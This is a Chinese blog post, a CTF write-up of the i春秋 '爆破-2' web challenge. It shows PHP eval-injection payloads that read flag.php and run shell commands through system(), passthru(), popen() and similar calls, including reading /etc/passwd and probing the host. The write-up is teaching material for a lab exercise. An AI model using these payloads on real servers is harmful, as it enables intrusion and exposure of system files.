<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="google-site-verification" content="TGrgd6itNVDcEjPh_ZJU-fc0-4WWeviPJnz7UOzkj-k" />














  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="CTF,Writeup,Web,Audit,PHP,i春秋,Linux,Bash," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2" />






<meta name="description" content="0x00 前言此题出自「百度杯」CTF 比赛 2017 二月场，是第二道 「爆破」系列的 Web 题，重点考察大家对 PHP 文件系统函数与命令执行函数的熟练度，难度中低，需要的基础知识有：PHP、Bash。 题目链接在「i春秋」的 CTF 大本营，解题链接通过创建在线靶场后得到：  题目链接：https://www.ichunqiu.com/battalion?t=1&amp;amp;r=57475">
<meta name="keywords" content="CTF,Writeup,Web,Audit,PHP,i春秋,Linux,Bash">
<meta property="og:type" content="article">
<meta property="og:title" content="【i春秋】 Web —— 爆破-2">
<meta property="og:url" content="https://ciphersaw.github.io/2018/08/31/【i春秋】 Web —— 爆破-2/index.html">
<meta property="og:site_name" content="Secrypt Agency">
<meta property="og:description" content="0x00 前言此题出自「百度杯」CTF 比赛 2017 二月场，是第二道 「爆破」系列的 Web 题，重点考察大家对 PHP 文件系统函数与命令执行函数的熟练度，难度中低，需要的基础知识有：PHP、Bash。 题目链接在「i春秋」的 CTF 大本营，解题链接通过创建在线靶场后得到：  题目链接：https://www.ichunqiu.com/battalion?t=1&amp;amp;r=57475">
<meta property="og:locale" content="en">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/question.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/file.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/file_get_contents.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/show_source.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/readfile.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/fread.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/php_os.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/backticks.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/system.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/exec.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/shell_exec.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/passthru.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/popen.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/ls.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/uname.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/ifconfig.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/ps.png">
<meta property="og:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/passwd.png">
<meta property="og:updated_time" content="2019-05-02T01:44:21.313Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【i春秋】 Web —— 爆破-2">
<meta name="twitter:description" content="0x00 前言此题出自「百度杯」CTF 比赛 2017 二月场，是第二道 「爆破」系列的 Web 题，重点考察大家对 PHP 文件系统函数与命令执行函数的熟练度，难度中低，需要的基础知识有：PHP、Bash。 题目链接在「i春秋」的 CTF 大本营，解题链接通过创建在线靶场后得到：  题目链接：https://www.ichunqiu.com/battalion?t=1&amp;amp;r=57475">
<meta name="twitter:image" content="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/question.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.2',
    sidebar: {"position":"right","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://ciphersaw.github.io/2018/08/31/【i春秋】 Web —— 爆破-2/"/>





  <title>【i春秋】 Web —— 爆破-2 | Secrypt Agency</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Secrypt Agency</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Welcome to a platform for network security artists.</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-friends">
          <a href="/friends/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-users"></i> <br />
            
            Friends
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="Searching..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://ciphersaw.github.io/2018/08/31/【i春秋】 Web —— 爆破-2/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Cipher Saw">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Secrypt Agency">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">【i春秋】 Web —— 爆破-2</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2018-08-31T20:16:04+08:00">
                2018-08-31
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/InfoSec/" itemprop="url" rel="index">
                    <span itemprop="name">InfoSec</span>
                  </a>
                </span>

                
                
                  , 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/InfoSec/Web/" itemprop="url" rel="index">
                    <span itemprop="name">Web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2018/08/31/【i春秋】 Web —— 爆破-2/" class="leancloud_visitors" data-flag-title="【i春秋】 Web —— 爆破-2">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Visitors&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h1><p>此题出自「百度杯」CTF 比赛 2017 二月场，是第二道 「爆破」系列的 Web 题，重点考察大家对 PHP <strong>文件系统函数</strong>与<strong>命令执行函数</strong>的熟练度，难度中低，需要的基础知识有：<strong>PHP、Bash</strong>。</p>
<p>题目链接在「i春秋」的 CTF 大本营，解题链接通过创建在线靶场后得到：</p>
<ul>
<li>题目链接：<a href="https://www.ichunqiu.com/battalion?t=1&amp;r=57475" target="_blank" rel="external">https://www.ichunqiu.com/battalion?t=1&amp;r=57475</a></li>
</ul>
<a id="more"></a>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/question.png" alt="question"></p>
<h1 id="0x01-利用文件系统函数"><a href="#0x01-利用文件系统函数" class="headerlink" title="0x01 利用文件系统函数"></a>0x01 利用文件系统函数</h1><p>打开链接，发现 PHP 源码与第一题的类似，只不过是少了对 <code>hello</code> 参数值的正则匹配：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">include</span> <span class="string">"flag.php"</span>;</div><div class="line">$a = @$_REQUEST[<span class="string">'hello'</span>];</div><div class="line"><span class="keyword">eval</span>( <span class="string">"var_dump($a);"</span>);</div><div class="line">show_source(<span class="keyword">__FILE__</span>);</div></pre></td></tr></table></figure>
<p>根据提示，flag 不再藏于某变量中，再由第 2 行的文件包含语句，推测 flag 应该在 flag.php 文件里。</p>
<p>因此，我们先尝试利用<a href="http://php.net/manual/en/ref.filesystem.php" target="_blank" rel="external">文件系统函数</a>来读取 flag.php 文件的内容，本题依旧与「爆破」关系不大。</p>
<h2 id="file"><a href="#file" class="headerlink" title="file()"></a>file()</h2><p><a href="http://php.net/manual/en/function.file.php" target="_blank" rel="external"><code>file()</code></a> 函数用于将整个文件读入数组中。</p>
<p>尝试构造 payload <code>hello=file(&quot;flag.php&quot;)</code>，提交后直接看到 flag，证明推测正确：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/file.png" alt="file"></p>
<h2 id="file-get-contents"><a href="#file-get-contents" class="headerlink" title="file_get_contents()"></a>file_get_contents()</h2><p><a href="http://php.net/manual/en/function.file-get-contents.php" target="_blank" rel="external"><code>file_get_contents()</code></a> 函数用于将整个文件读入到一个字符串中。</p>
<p>尝试构造 payload <code>hello=file_get_contents(&quot;flag.php&quot;)</code>，提交后竟未显示 flag？这是因为 flag.php 文件中的内容以界定符 <code>&lt;?php</code> 开头，所以输出到浏览器时，该字符串被当做 PHP 脚本不予显示。但不必担心，右击页面空白处，查看网页源代码，即可看到 flag：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/file_get_contents.png" alt="file_get_contents"></p>
<h2 id="show-source"><a href="#show-source" class="headerlink" title="show_source()"></a>show_source()</h2><p><a href="http://php.net/manual/en/function.show-source.php" target="_blank" rel="external"><code>show_source()</code></a> 函数等同于 <a href="http://php.net/manual/en/function.highlight-file.php" target="_blank" rel="external"><code>highlight_file()</code></a> 函数，可将一个 PHP 脚本文件语法高亮。</p>
<p>尝试构造 payload <code>hello=show_source(&quot;flag.php&quot;)</code>，提交后能看到语法高亮后的 flag：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/show_source.png" alt="show_source"></p>
<h2 id="readfile"><a href="#readfile" class="headerlink" title="readfile()"></a>readfile()</h2><p><a href="http://php.net/manual/en/function.readfile.php" target="_blank" rel="external"><code>readfile()</code></a> 函数用于读取一个文件并写入到输出缓冲区。</p>
<p>在提交 payload <code>hello=readfile(&quot;flag.php&quot;)</code> 后，在网页源代码处可看到 flag：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/readfile.png" alt="readfile"></p>
<h2 id="fread"><a href="#fread" class="headerlink" title="fread()"></a>fread()</h2><p><a href="http://php.net/manual/en/function.fread.php" target="_blank" rel="external"><code>fread()</code></a> 函数用于读取二进制文件，不过首先得用 <a href="http://php.net/manual/en/function.fopen.php" target="_blank" rel="external"><code>fopen()</code></a> 函数创建文件句柄，填入第一个参数，并在第二个参数中填入可读取的最大字节数。</p>
<p>因此，构造 payload <code>hello=fread(fopen(&quot;flag.php&quot;,&quot;r&quot;),100)</code>，提交后在网页源代码处可看到 flag：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/fread.png" alt="fread"></p>
<p>以上是直接读取脚本文件源码的常见函数，感兴趣的读者可深入研究。</p>
<h1 id="0x02-利用命令执行函数"><a href="#0x02-利用命令执行函数" class="headerlink" title="0x02 利用命令执行函数"></a>0x02 利用命令执行函数</h1><p>下面介绍另一种获取文件内容的方式，即利用 PHP 中的<a href="http://php.net/manual/en/ref.exec.php" target="_blank" rel="external">命令执行函数</a>，通过执行系统命令以显示文件内容。</p>
<p>首先，由预定义常量 <a href="http://php.net/manual/en/reserved.constants.php" target="_blank" rel="external"><code>PHP_OS</code></a> 可知后台操作系统的类型，构造 <code>hello=PHP_OS</code> 提交后，发现是 Linux 操作系统：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/php_os.png" alt="php_os"></p>
<h2 id="执行运算符"><a href="#执行运算符" class="headerlink" title="执行运算符"></a>执行运算符</h2><p>PHP 的<a href="http://php.net/manual/en/language.operators.execution.php" target="_blank" rel="external">执行运算符</a>为反引号「`」，可将反引号之间的内容作为 shell 命令执行，并返回所有执行结果。</p>
<p>在构造 payload 之前，需要做两件事：</p>
<ul>
<li>闭合前面的 <code>var_dump(</code> 字符串。</li>
<li>注释后面的 <code>);</code> 字符串。</li>
</ul>
<p>因此，构造 payload <code>hello=);echo `cat flag.php`;//</code>，提交后在网页源代码处即可看到 flag：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/backticks.png" alt="backticks"></p>
<h2 id="system"><a href="#system" class="headerlink" title="system()"></a>system()</h2><p><a href="http://php.net/manual/en/function.system.php" target="_blank" rel="external"><code>system()</code></a> 函数用于执行外部程序，输出执行结果，并返回结果的最后一行。</p>
<p>因此，在提交 payload <code>hello=);echo system(&quot;cat flag.php&quot;);//</code> 后，在网页源代码处可看到两个 flag，是因为第一个 flag 是由输出结果而得，第二个 flag 是由返回值而得：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/system.png" alt="system"></p>
<h2 id="exec"><a href="#exec" class="headerlink" title="exec()"></a>exec()</h2><p><a href="http://php.net/manual/en/function.exec.php" target="_blank" rel="external"><code>exec()</code></a> 函数用于执行一个外部程序，并返回结果的最后一行。</p>
<p>因此，在提交 payload <code>hello=);echo exec(&quot;cat flag.php&quot;);//</code> 后，直接可见 flag，因此 flag 正好是 flag.php 文件中的最后一行：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/exec.png" alt="exec"></p>
<h2 id="shell-exec"><a href="#shell-exec" class="headerlink" title="shell_exec()"></a>shell_exec()</h2><p><a href="http://php.net/manual/en/function.shell-exec.php" target="_blank" rel="external"><code>shell_exec()</code></a> 函数可通过 shell 环境执行命令，并返回所有执行结果，本函数功能与执行运算符相同。</p>
<p>因此，构造 payload <code>hello=);echo shell_exec(&quot;cat flag.php&quot;);//</code>，提交后在网页源代码处即可看到 flag：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/shell_exec.png" alt="shell_exec"></p>
<h2 id="passthru"><a href="#passthru" class="headerlink" title="passthru()"></a>passthru()</h2><p><a href="http://php.net/manual/en/function.passthru.php" target="_blank" rel="external"><code>passthru()</code></a> 函数用于执行外部函数，并输出原始执行结果，没有返回值。</p>
<p>因此，构造 payload <code>hello=);echo passthru(&quot;cat flag.php&quot;);//</code>，提交后在网页源代码处即可看到 flag：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/passthru.png" alt="passthru"></p>
<h2 id="popen"><a href="#popen" class="headerlink" title="popen()"></a>popen()</h2><p><a href="http://php.net/manual/en/function.popen.php" target="_blank" rel="external"><code>popen()</code></a> 函数用于创建指向命令执行进程的文件句柄，与 <code>fopen()</code> 函数类似，最后将通过 <code>fread()</code> 函数读取命令执行的结果。</p>
<p>因此，构造 payload <code>hello=);echo fread(popen(&quot;cat flag.php&quot;,&quot;r&quot;),100);//</code>，提交后在网页源代码处即可看到 flag：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/popen.png" alt="popen"></p>
<p>以上是通过执行系统命令打印出文件内容的常见函数，感兴趣的读者可深入研究。</p>
<h1 id="0x03-题外话"><a href="#0x03-题外话" class="headerlink" title="0x03 题外话"></a>0x03 题外话</h1><p>既然能执行系统命令，可拓展的思路那就多了，比如存在目录遍历漏洞、查看当前 Linux 版本信息、查看当前网卡信息、查看当前进程信息、查看所有用户信息等。</p>
<p>下面以 <code>pathssru()</code> 函数为例，简单地介绍一下命令执行漏洞的利用方法。</p>
<h2 id="目录遍历漏洞"><a href="#目录遍历漏洞" class="headerlink" title="目录遍历漏洞"></a>目录遍历漏洞</h2><p><a href="https://en.wikipedia.org/wiki/Directory_traversal_attack" target="_blank" rel="external">目录遍历漏洞</a>是由于系统未过滤用户输入的目录跳转符 <code>../</code>，导致恶意用户可通过不断提交若干个目录跳转符，从而遍历系统中的所有目录。</p>
<p>经过笔者不断尝试，查看大部分目录下有哪些文件是没问题的，如提交 payload <code>hello=);echo passthru(&quot;ls ../../../&quot;);//</code> 后，即可看到根目录下的所有文件：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/ls.png" alt="ls"></p>
<h2 id="查看当前-Linux-版本信息"><a href="#查看当前-Linux-版本信息" class="headerlink" title="查看当前 Linux 版本信息"></a>查看当前 Linux 版本信息</h2><p>通过 <code>uname -a</code> 命令可查看当前 Linux 版本信息。</p>
<p>因此，构造 payload <code>hello=);echo passthru(&quot;uname -a&quot;);//</code>，提交后可见当前 Linux 内核版本为 <code>3.10.0-514.26.2.el7.x86_64</code>：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/uname.png" alt="uname"></p>
<h2 id="查看当前网卡信息"><a href="#查看当前网卡信息" class="headerlink" title="查看当前网卡信息"></a>查看当前网卡信息</h2><p>通过 <code>ifconfig</code> 命令可查看当前网卡信息。</p>
<p>因此，构造 payload <code>hello=);echo passthru(&quot;ifconfig&quot;);//</code>，提交后可见 eth0 网卡的 IP 地址为 <code>172.17.0.26</code>：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/ifconfig.png" alt="ifconfig"></p>
<h2 id="查看当前进程信息"><a href="#查看当前进程信息" class="headerlink" title="查看当前进程信息"></a>查看当前进程信息</h2><p>通过 <code>ps aux</code> 命令可查看当前进程信息。</p>
<p>因此，构造 payload <code>hello=);echo passthru(&quot;ps aux&quot;);//</code>，提交后可见当前所有进程的信息：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/ps.png" alt="ps"></p>
<h2 id="查看所有用户信息"><a href="#查看所有用户信息" class="headerlink" title="查看所有用户信息"></a>查看所有用户信息</h2><p>通过 <code>cat /etc/passwd</code> 命令可查看所有用户信息。</p>
<p>因此，构造 payload <code>hello=);echo passthru(&quot;cat /etc/passwd&quot;);//</code>，提交后可见当前所有用户的信息：</p>
<p><img src="https://blog-1255335783.cos.ap-guangzhou.myqcloud.com/i%E6%98%A5%E7%A7%8B_Web_%E7%88%86%E7%A0%B4_2/passwd.png" alt="passwd"></p>
<p>其中当前的用户名是 <code>apache</code>，不要问我是怎么知道的。</p>
<p>到此为止，这道题就告一段落了，读者感兴趣的话可挖掘更多的玩法，只可惜当前用户不是 root，不然可玩性就更高了：)</p>

      
    </div>
    
    
    

    

    

    
      <div>
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  <!-- JS库 sweetalert 可修改路径 -->
  <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.7.1/jquery.min.js"></script>
  <script src="https://cdn.bootcss.com/sweetalert/1.1.0/sweetalert.min.js"></script>
  <link rel="stylesheet" type="text/css" href="https://cdn.bootcss.com/sweetalert/1.1.0/sweetalert.min.css">
  <p><span>本文标题:</span><a href="/2018/08/31/【i春秋】 Web —— 爆破-2/">【i春秋】 Web —— 爆破-2</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 Cipher Saw 的个人博客">Cipher Saw</a></p>
  <p><span>发布时间:</span>2018年08月31日 - 20:08</p>
  <p><span>最后更新:</span>2019年05月02日 - 09:05</p>
  <p><span>原始链接:</span><a href="/2018/08/31/【i春秋】 Web —— 爆破-2/" title="【i春秋】 Web —— 爆破-2">https://ciphersaw.github.io/2018/08/31/【i春秋】 Web —— 爆破-2/</a>
    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="https://ciphersaw.github.io/2018/08/31/【i春秋】 Web —— 爆破-2/"  aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> </p>  
  <p>转载请保留原文链接及作者，谢谢！</p>
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
    clipboard.on('success', $(function(){
      $(".fa-clipboard").click(function(){
        swal({   
          title: "",   
          text: '复制成功',   
          html: false,
          timer: 500,   
          showConfirmButton: false
        });
      });
    }));  
</script>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
            <a href="/tags/Writeup/" rel="tag"># Writeup</a>
          
            <a href="/tags/Web/" rel="tag"># Web</a>
          
            <a href="/tags/Audit/" rel="tag"># Audit</a>
          
            <a href="/tags/PHP/" rel="tag"># PHP</a>
          
            <a href="/tags/i春秋/" rel="tag"># i春秋</a>
          
            <a href="/tags/Linux/" rel="tag"># Linux</a>
          
            <a href="/tags/Bash/" rel="tag"># Bash</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/08/27/【i春秋】 Web —— 爆破-1/" rel="next" title="【i春秋】 Web —— 爆破-1">
                <i class="fa fa-chevron-left"></i> 【i春秋】 Web —— 爆破-1
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/09/11/【i春秋】 Web —— 爆破-3/" rel="prev" title="【i春秋】 Web —— 爆破-3">
                【i春秋】 Web —— 爆破-3 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8zMjUyNS85MDg2"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          
            <img class="site-author-image" itemprop="image"
              src="/images/avatar.jpg"
              alt="Cipher Saw" />
          
            <p class="site-author-name" itemprop="name">Cipher Saw</p>
            <p class="site-description motion-element" itemprop="description">Not to be whom you don't want to be.</p>
        </div>

        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
            
              <a href="/archives/">
            
                <span class="site-state-item-count">23</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">12</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">56</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/ciphersaw" target="_blank" title="GitHub">
                  
